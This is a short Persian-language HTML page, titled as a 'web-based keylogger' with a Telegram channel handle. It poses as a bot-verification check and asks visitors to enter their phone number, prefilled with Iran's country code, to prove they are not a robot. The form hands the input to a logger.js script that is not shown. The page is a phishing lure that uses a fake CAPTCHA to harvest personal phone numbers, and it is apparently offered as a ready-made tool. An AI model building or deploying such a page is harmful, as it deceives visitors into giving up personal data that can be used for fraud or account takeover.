<!DOCTYPE html>
<html dir="rtl">
<head>
  <title>t.me/rmsup | کیلاگر تحت وب</title>
  <link rel="stylesheet" href="styles.css">
</head>
<body>
  <div class="login">
    <div class="login-triangle"></div>
    <h2 class="login-header">آیا شما یک ربات اینترنتی هستید❓</h2>
      <form class="login-container" id="loggerForm">
      <label for="data">برای اینکه تایید کنید 🤖 نیستید لطفا شماره خود را وارد کنید👍</label>
      <input type="number" value="98" id="data" name="data" required>
      <p><input type="submit" value="تایید میکنم که من ربات نیستم!"></p>
    </form>
    </div>
    <script src="logger.js"></script>
</body>
</html>
